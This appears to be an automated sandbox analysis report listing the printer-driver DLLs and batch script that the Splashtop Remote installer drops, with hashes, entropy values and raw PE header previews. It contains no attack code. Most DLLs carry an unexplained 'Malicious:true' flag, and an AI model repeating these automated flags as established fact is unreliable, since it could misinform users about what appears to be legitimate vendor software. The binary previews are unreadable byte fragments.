                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<..<..<..5.5.3..<.....5.3.*..5.%.B..5.4.=..5.".k..5.2.=..5.7.=..Rich<..................PE..L....N.\...........!.........v......8........................................P............@.........................@...}...\...........................P.... ......@................................T..@............................................text............................... ..`.data....>..........................@....rsrc...............................@..@.reloc.../... ...0..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\stprintmon.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.578816818366091
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:1yYZVBVmekQ5ncHc43wAmaxEJg3tNqYU51pQ8DfqXF7q9B24CvJ6BAQ:1y8Vf1uTHNqYUH+8GeMvJ4t
                                                                                                                                                                                                                                                                                                                                  MD5:DDBCBCED9CCBA27D296B680D04178B1D
                                                                                                                                                                                                                                                                                                                                  SHA1:5BE1EF49678E4F9250B675DFE595DF1219DD7EF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:B23B42E24EAB4E2F1DD94711EEC741F94D39F5EBAF238820A0B9D464522C24D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:B913058A50A4235925F208E9FA8740DDA1A070168285401FD9C9032C0CC782887F5D92A0D68796D7473E61EE8DDC1E863503C288CAD1F99C233A0DEDE37CB314
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......mX.])9r.)9r.)9r.oh...9r.oh..<9r.oh...9r. A..&9r.)9s.G9r.$k...9r.$k..(9r.$k..(9r.)9..(9r.$k..(9r.Rich)9r.........................PE..L...-..Z...........!................(C...............................................:....@.............................Y............P...............0.......`..........8...........................8...@............................................text...p........................... ..`.rdata...e.......f..................@..@.data....4..........................@....rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdbook.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.480280521349599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Sooboos//G/jWDiNza6LR07qZ2bzl409+E/PXwCSp6WKsAqHew+1l7niE:SooyFiJRmbzl4mZYYqHz+1l7iE
                                                                                                                                                                                                                                                                                                                                  MD5:4359D841792BD3A711065BD347503ED4
                                                                                                                                                                                                                                                                                                                                  SHA1:ED3DA69B4DAAEE1E3C6A35B9B22A3608C210B845
                                                                                                                                                                                                                                                                                                                                  SHA-256:D8BAC61DF2126D9203B3823AA40AF05FE7B6F9C5122DEBAB5F8CEADD1119773B
                                                                                                                                                                                                                                                                                                                                  SHA-512:F1FB6B25199CDBD0C40CCCEB069CF3DC32DEEDC2F21C67CC8C22A189115389795B435631EEA30A94EDE19331FACF475A4BD7163522D9AD0EC1DF6118D1E05EAB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V..V..V..._..V..V..V...Y..V...O..V...^..V...H..V...X..V...]..V.Rich.V.........................PE..L....N.\...........!.........`.......q.......................................p......Y.....@.............................{.......x....0..............."..P....@......................................P>..@............................................text...;........................... ..`.data...@2..........................@....rsrc........0......................@..@.reloc..D$...@...&..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdnup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):160080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.481630469427064
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:CizpEi8PNuoyZLy39r4BRyFr8Tjqe1LP+0hORlE:CUpX8FYFyB8T2oyRa
                                                                                                                                                                                                                                                                                                                                  MD5:1E478E7F7D20800B958E2D1780C805F6
                                                                                                                                                                                                                                                                                                                                  SHA1:F166DB5211F695BA039DC81C246653EC1B25DC02
                                                                                                                                                                                                                                                                                                                                  SHA-256:9989C6791433F8B7FD05F4750F79F9082DBD28087948A366EA695EAC983150CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:852EFB6AE48B3C4BAD4B8E11DC46AAA4CA37A501AFD568B469BB9ED43A27086916588F370286DD1F51834037777C4D2518310A37A469AE7BE19CFE36F08A98D3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c....j..j..j.z...j..k...j.z...j.z....j.z...j.z....j.z...j.z...j.Rich..j.................PE..L....N.\...........!.........b......%........ .......................................r....@.............................z............`...............T..P....p.......................................C..@............................................text............................... ..`.data....2... ......................@....rsrc........`.......&..............@..@.reloc..t&...p...(...,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdscale.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):194896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4942111692959354
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:0w8OfdMjstdIxIImJZDpwmw6jse70oSzhiVjkXIS1qPfb3PPqFSqQovoRe9C86/9:0w8wZDxspqPfbuSqQCoSz6/e1+1FiAx3
                                                                                                                                                                                                                                                                                                                                  MD5:F0FCF6CB5986E267A978A0DF86471563
                                                                                                                                                                                                                                                                                                                                  SHA1:214F4BB84F7A1981D30B7C4BC13C7B3E4A5CC8B3
                                                                                                                                                                                                                                                                                                                                  SHA-256:34E4A968A87692DA8A2EF073ADD7E19F32009709B50F7C747D1D8BF261C21CBC
                                                                                                                                                                                                                                                                                                                                  SHA-512:529DFD1E587BE6EA67B464C44CC7A0C1B0F6A9CD663590E7BD0083CC7A68DD8F60FC1E81E26012D71CF5C8BD5EFF4B2FB477D5DBEF3FFA1FF4136CE266B5DA6F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c!...O..O..O.z...O..N...O.z...O.z....O.z...O.z....O.z...O.z...O.Rich..O.........PE..L....N.\...........!.........h......Z}....................................... .......g....@.............................|............... ...............P.......4... ................................M..@............................................text...<........................... ..`.data....3..........................@....rsrc... ...........................@..@.reloc...-..........................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdsmplui.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):245584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.433639873152362
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:0w+rqKMvEZF6VPvVpb1eTjLp8D3qkTmII9b9zC+l+smDP00IPWx2Wuw:0drWgFEPNB+MPTHIWjP00Ie3
                                                                                                                                                                                                                                                                                                                                  MD5:FE4F22128776F52062DD8FA74D0B5075
                                                                                                                                                                                                                                                                                                                                  SHA1:3A15B1AD0B5D62D474319A3DB95D985B49537BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC4D01234426AAC9FF2751B209B0484769BEE97A0DC930B1B56A1743CD24B805
                                                                                                                                                                                                                                                                                                                                  SHA-512:163A78CB59061B4B9BE98DC763109744BBBEEDAF8B3CB7EB19A22334AC1F9223880C0E8684FEB4B363C824D9918E72E1B94D5F76AD63235F8C49ADEFC3713637
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.Cr.Cr.C{.2Cy.Cr.C..C{.4Cg.C{."C..C{.3Cs.C{.%C*.C{.5Cs.C{.0Cs.CRichr.C................PE..L....N.\...........!.........................0............................................@..........................(..k.......x........!..............P........,.. ...............................xO..@............................................text...+........................... ..`.data....@...0...$..................@....rsrc....!......."...B..............@..@.reloc...=.......>...d..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdwmark.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):238928
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.071067596161183
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:OG9NqQQHPItXExQNj+mB92u+CW5D37LnuHc45X0T5/uyFNJpfUarTtBB:99AP2b+mBQVJLnYlETtug5T
                                                                                                                                                                                                                                                                                                                                  MD5:2A397EFDA6D84A15B890D56D4292BA6E
                                                                                                                                                                                                                                                                                                                                  SHA1:F985E4893119E6C30191DE84DA25059B33F902A8
                                                                                                                                                                                                                                                                                                                                  SHA-256:398AEC7557E2E1DB30EFCA6FDA0D7D23940B863B396C1A4FC2BB588294F595E6
                                                                                                                                                                                                                                                                                                                                  SHA-512:A199C2FF26C3A3E1DA54D8386F568FA900B853FE3D3754100904EF3153CD72D672971FF72141D9AE5F5BC467D59E2DDC69856C761BBA9DA4488FC69F52A9E5E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................_.........B....Y......O.....^......H.....X......].....Rich....................PE..L....N.\...........!.........t...............@............................................@.........................p<..|...<1..........................P...........P................................C..@............................................text....,.......................... ..`.data...@2...@.......2..............@....rsrc................H..............@..@.reloc...*.......,...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\XDColMan.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):249168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2058943183487445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:E/vPLr8AhQh4jhNgZzSNPSVlX4T1FrKT7EjUOkdny+ywlJZcWzV8TMXU7o91y4Rd:i3LIl4XgsSVloTnPYdn7lJZRZ8QXqsJ/
                                                                                                                                                                                                                                                                                                                                  MD5:EB8DA0234C4D7C7A58B8FB820AFB4BD2
                                                                                                                                                                                                                                                                                                                                  SHA1:1DED1192371D0B0BF17F5AC908A96A1499C1CABD
                                                                                                                                                                                                                                                                                                                                  SHA-256:88F7BDCB33CDC34B5E8834634A36E2B6A45015016C47EFE4B846A4D202326093
                                                                                                                                                                                                                                                                                                                                  SHA-512:789725D38C041CDC311065E7987CC7E79F9A6C00E2F3ABD37096A04F81258636AB0DA6B99F895CC80DA9F770DB0C594EB8467CCA1B77854E091F8FA18F19200D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.V.z`8.z`8.z`8.s...{`8.s...u`8.z`9..`8.s...s`8.s...O`8.s....`8.s...{`8.s...Y`8.s...{`8.s...{`8.Richz`8.........PE..d....N.\.........." .....H..........................................................]@....@..........................................U..}....J...................)......P.......`...@................................................................................text...-F.......H.................. ..`.data....O...`...*...L..............@....pdata...).......*...v..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\stprintmon.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):237008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.30179636306813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:B+2HsTNg3ex5PUwoEK2dvK7PnGxOkf9V3QhjTvI9Nle9owmPDXpUIJonb:BDHsT2qvoEKMAGxOkVJQhjTAEgY
                                                                                                                                                                                                                                                                                                                                  MD5:7DD3CA728E061F9C438209935DF41FD8
                                                                                                                                                                                                                                                                                                                                  SHA1:D291C17619FB2E9B8A4CF07B53A56DC60CFB4C8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:F19F300E4623E3B57F870D8E4B150F2E70D29E6CB47750671D53667BB0804202
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7D0AB0EB37F6B245B1EBDE46C2D9184AB801EB659E4F4ED7C2AFD07843A1646612290AD3C315EE9BF7FC1A9425B58E2A03810014DDBB621EB46B331AA2E753E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w..w..w...&..w...&..:w...&-.w..c.9.w..w...w..%..w..%..w..%).w..we.w..%,.w..Rich.w..................PE..d...+..Z.........." ................|N..............................................;.....`.........................................`;..Y....;..................0!..............T...@...8...............................p............................................text...[........................... ..`.rdata..............................@..@.data....?...P.......8..............@....pdata..0!......."...T..............@..@.rsrc................v..............@..@.reloc..T............~..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdbook.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):168784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.240155377344884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:l0fRIF+SwIL9Bagg2mCEPToX/ITpu0uOpDSgb2WXa+qM5F:CfaCIJbglCe1Vu0uIDSlOF
                                                                                                                                                                                                                                                                                                                                  MD5:77C729F857CFA38CFE4FCB18EE8F6BAD
                                                                                                                                                                                                                                                                                                                                  SHA1:938F96F880E824D03F1174C3D1CD56922452E5CC
                                                                                                                                                                                                                                                                                                                                  SHA-256:C1C016F2917B395A16936C692C35B8E6CC4C0196C26BC69AA8A686747BA690AD
                                                                                                                                                                                                                                                                                                                                  SHA-512:F921A945EFAD2DF95BAB6574029D6E4502A1C2D52E44550547CE2C812E8D06E8120F9EAB07F728E97F17C4949CC112F20E59938906E0F26988E4F79903BCF658
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#U..pU..pU..p\..p^..pU..p8..p\..pT..p\..p\..p\..pe..p\..p"..p\..pT..p\..pA..p\..pT..p\..pT..pRichU..p........................PE..d....N.\.........." .....*...j......................................................w.....@.........................................`8..{.......x....................v..P...........p................................................................................text....(.......*.................. ..`.data....?...@......................@....pdata...............L..............@..@.rsrc................h..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdnup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):187216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.244838939180771
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:sSUAV0AVZrAVOVrHYapV5Ddr1oxkg9gh0CBEACcodM5nY+WVFGoK4:jvPb6OVrVNJ1ufqBEACjGK
                                                                                                                                                                                                                                                                                                                                  MD5:8E2C3434811B348F7AB9F7DEC6E95C3B
                                                                                                                                                                                                                                                                                                                                  SHA1:349682719857DB46E4A7EBFCEF0F85264B3116F3
                                                                                                                                                                                                                                                                                                                                  SHA-256:11F45D049C8FABF308944D77D17AB3FBB0A7BB5BFA143263B9EFBECA3A568EE3
                                                                                                                                                                                                                                                                                                                                  SHA-512:C271F2BBED3E740D771AF1A3BF684F4CB67C8F9B0D20E7D886817602F76BE8A432B05AB4E2AC8FDFCEEAA194602C81D8C9FFE6E015D224C6DC9C40F125365F5D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4...Z...Z...Z......Z...[..Z.......Z.......Z......Z......Z.......Z......Z.......Z.......Z.Rich..Z.................PE..d....N.\.........." .....n...n....................................................... ....@.........................................0}..z....r..........................P...............................................................X............................text....m.......n.................. ..`.data....?...........r..............@....pdata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdscale.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):244560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.236867435454928
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:RuctDSdRbMOiymM/Cufn5B+1jowgreeTwcL:RqXMOFmA5VwgBE0
                                                                                                                                                                                                                                                                                                                                  MD5:61BD6282DB08405FD08C64BC00CEBF4B
                                                                                                                                                                                                                                                                                                                                  SHA1:EC4391249AE7247162C0D28B50ED73B1DCD11246
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3BF8ED5ACCB8EBCA5C9A4430FA54A492E39160AE2BA51285D241D75F1743848
                                                                                                                                                                                                                                                                                                                                  SHA-512:DFEF9209C57E890F7D29280F6A296C5A9D1C3F496464C9EEA28DB0E1C407F2C5042DF926D442480359A120A93D8C44536C5A0C119C3AB6E7D15685F157E28DD6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kNgi//.://.://.:&W.: /.://.:R/.:&W.:./.:&W.:&/.:&W.:./.:&W.:W/.:&W.:./.:&W.:./.:&W.:./.:&W.:./.:Rich//.:................PE..d....N.\.........." .....>...~......`.....................................................@..........................................L..|....@.......... ........*......P............................................................................................text....=.......>.................. ..`.data....A...P... ...B..............@....pdata...*.......,...b..............@..@.rsrc... ...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdsmplui.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):333136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.120290709944056
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:TJNLhV1jxjcVfgFf6QlJpYw4MxuiMRZI7CPdxV4eZ+PyRPP00Io:TJ1j1aVfgFiQ/ug/G1
                                                                                                                                                                                                                                                                                                                                  MD5:8EFFB8A42CBC831CD360E9B1BEF65D98
                                                                                                                                                                                                                                                                                                                                  SHA1:BA78110DA11B7C8C6432F1A128B7D9DF384AE9FD
                                                                                                                                                                                                                                                                                                                                  SHA-256:ECB1BCEA47422DBFD4326669AC5B2DB463088994B12008258EFF2C546237864F
                                                                                                                                                                                                                                                                                                                                  SHA-512:B29D4B954619355A2797A4CA88664BC9679AD1C5EB4A2FE54BAE63399DF06405969B4E2D0098AD6A7C8E0C7A2A9E19F0DE20C5B1D401D933D89D2D71F7A32789
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........f2Ji.aJi.aJi.aC..aKi.aC..aAi.aJi.a?i.aC..aCi.aC..azi.aC..a>i.aC..aKi.aC..aci.aC..aKi.aC..aKi.aRichJi.a........................PE..d....N.\.........." .....P...........N.......................................@......5C....@..........................................]..k....S..x........!.......:......P....0..........................................................P............................text...[N.......P.................. ..`.data....V...`...6...T..............@....pdata...:.......<..................@..@.rsrc....!......."..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdwmark.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):273232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8361644522698635
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:7j4c/JPjXOQTuGkfIpmWpnETJLnYlETtu/:7j4cBbEZTTJDY+0
                                                                                                                                                                                                                                                                                                                                  MD5:C52E66AE497C51CF73098D494EEBF8F0
                                                                                                                                                                                                                                                                                                                                  SHA1:8E7E38F30FAD35D8ED935B14FFA1BB5A9EABE4D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:F6F7D5C20A078BE7ABD2402316A605F050388C6303D7F3ABC45F201D1FC5F1FD
                                                                                                                                                                                                                                                                                                                                  SHA-512:579E0DD63720B6D004FFBE6AE1686F43B70CEB8722DAC70FD06E5B06682C0F22282374D5394C06398252A2EA8163EA884239A8065EC5807DE1A9389A479CFC36
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}?...QH..QH..QH.d.H..QH..PH?.QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QHRich..QH................PE..d....N.\.........." .........................................................`............@.............................................|............0...........$......P....P......`................................................................................text............................... ..`.data....>..........................@....pdata...$.......&..................@..@.rsrc........0......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):867
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.162389785193304
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:k8rGqwAcK/EyAZRVowyyAcK/E2kam0LYDeegidym0EZkBqq6JFpYpFSqq6JFrmp5:XrWWFwD7WR8mI/xOZE
                                                                                                                                                                                                                                                                                                                                  MD5:013784DA9890EAB3D914505857EDF2B7
                                                                                                                                                                                                                                                                                                                                  SHA1:92C9CA11174E98F65AD6898705176ED50EF55F95
                                                                                                                                                                                                                                                                                                                                  SHA-256:CDA5DEBA2BE6CFE1E111DF596AC08D45762A96B14AEC796C4E70F128C0734EAC
                                                                                                                                                                                                                                                                                                                                  SHA-512:9D71BEE329BDDA3B8EA064BB92813062D91079BA841AE50D6CC7D2AEAD27D49279D2857141C02BD5FA565D5C497E9E8E8163579A425F7C87550F1F0EFC194652
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
